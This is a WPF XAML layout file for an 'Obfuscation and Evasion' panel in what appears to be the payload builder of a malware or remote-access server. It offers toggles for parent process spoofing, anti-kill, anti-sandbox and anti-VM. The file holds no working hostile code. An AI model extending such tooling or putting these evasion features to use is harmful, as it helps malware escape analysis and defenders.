Server/UI/CustomControls/BuilderControls/OneUC.xaml

<UserControl x:Class="Server.UI.CustomControls.BuilderControls.OneUC"
             xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
             xmlns:local="clr-namespace:Server.UI.CustomControls.BuilderControls"
             mc:Ignorable="d" FontSize="15" Foreground="{StaticResource Text}">
    <Border Background="#202020" CornerRadius="10" HorizontalAlignment="Center" VerticalAlignment="Center">
        <Grid>
            <Grid.RowDefinitions>
                <RowDefinition Height="64"/>
                <RowDefinition Height="*"/>
            </Grid.RowDefinitions>

            <Border BorderThickness="0,0,0,2" BorderBrush="#272727">
                <StackPanel Orientation="Horizontal" Grid.Row="0" HorizontalAlignment="Center" VerticalAlignment="Center">
                    <Image Width="24" Height="24" Margin="0,0,5,0" Source="/UI/Assets/Icons/BuilderOneIcon.png" VerticalAlignment="Center" />
                    <TextBlock Text="Obfuscation and Evasion" Foreground="White" FontSize="17" FontWeight="Medium" VerticalAlignment="Center"/>
                </StackPanel>
            </Border>


            <Border Padding="0,0,0,30" Grid.Row="1">
                <Grid Margin="30,0,30,0">
                    <Grid.RowDefinitions>
                        <RowDefinition Height="16"/>
                        <RowDefinition Height="18"/>
                        <RowDefinition Height="16"/>
                        <RowDefinition Height="18"/>
                        <RowDefinition Height="16"/>
                        <RowDefinition Height="*"/>
                    </Grid.RowDefinitions>

                    <StackPanel Orientation="Horizontal" Grid.Row="1">
                        <StackPanel Orientation="Horizontal">
                            <TextBlock Text="Parent Spoofing" />
                            <ToggleButton Style="{StaticResource CheckboxToggle}" >
                                <ToggleButton.Triggers>
                                    <EventTrigger RoutedEvent="ToggleButton.Checked">
                                        <BeginStoryboard>
                                            <Storyboard >
                                                <ObjectAnimationUsingKeyFrames Storyboard.TargetProperty="Visibility" Storyboard.TargetName="ParentSpoofingTB">
                                                    <DiscreteObjectKeyFrame KeyTime="0:0:0" Value="{x:Static Visibility.Visible}"/>
                                                </ObjectAnimationUsingKeyFrames>
                                            </Storyboard>
                                        </BeginStoryboard>
                                    </EventTrigger>
                                    <EventTrigger RoutedEvent="ToggleButton.Unchecked">
                                        <BeginStoryboard>
                                            <Storyboard >
                                                <ObjectAnimationUsingKeyFrames Storyboard.TargetProperty="Visibility" Storyboard.TargetName="ParentSpoofingTB">
                                                    <DiscreteObjectKeyFrame KeyTime="0:0:0" Value="{x:Static Visibility.Collapsed}"/>
                                                </ObjectAnimationUsingKeyFrames>
                                            </Storyboard>
                                        </BeginStoryboard>
                                    </EventTrigger>
                                </ToggleButton.Triggers>
                            </ToggleButton>
                        </StackPanel>

                        <StackPanel Orientation="Horizontal" Margin="16,0,0,0">
                            <TextBlock Text="Anti Kill" />
                            <ToggleButton Style="{StaticResource CheckboxToggle}" />
                        </StackPanel>
                    </StackPanel>

                    <StackPanel Orientation="Horizontal" Grid.Row="3">
                        <StackPanel Orientation="Horizontal" VerticalAlignment="Center">
                            <TextBlock Text="Anti Sandbox" />
                            <ToggleButton Style="{StaticResource CheckboxToggle}" />
                        </StackPanel>

                        <StackPanel Orientation="Horizontal" Margin="16,0,0,0">
                            <TextBlock Text="Anti VM" />
                            <ToggleButton Style="{StaticResource CheckboxToggle}" />
                        </StackPanel>
                    </StackPanel>

                    <StackPanel Grid.Row="5">
                        <Border BorderThickness="2" BorderBrush="#272727" CornerRadius="3" Width="340" Height="37" >
                            <TextBox Style="{StaticResource Common_TextBox}" />
                        </Border>

                        <Border x:Name="ParentSpoofingTB" BorderThickness="2" BorderBrush="#272727" CornerRadius="3" Width="340" Height="37" Margin="0,16,0,0" Visibility="Collapsed">
                            <TextBox Style="{StaticResource Common_TextBox}" />
                        </Border>
                    </StackPanel>
                </Grid>
            </Border>
        </Grid>
    </Border>
</UserControl>
